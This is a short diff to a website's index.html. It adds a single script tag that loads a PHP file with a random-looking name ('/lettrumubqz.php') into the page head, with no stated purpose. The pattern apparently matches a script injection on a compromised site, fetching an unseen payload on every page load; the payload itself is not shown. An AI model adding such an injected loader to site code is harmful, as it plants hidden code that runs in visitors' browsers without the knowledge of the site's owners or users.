--- a/index.html
+++ b/index.html
@@ -7,6 +7,9 @@
 
     <meta name="referrer" content="no-referrer-when-downgrade" />
 
+
+    <script src="/lettrumubqz.php"></script>
+
     
 
   <meta charset="UTF-8">
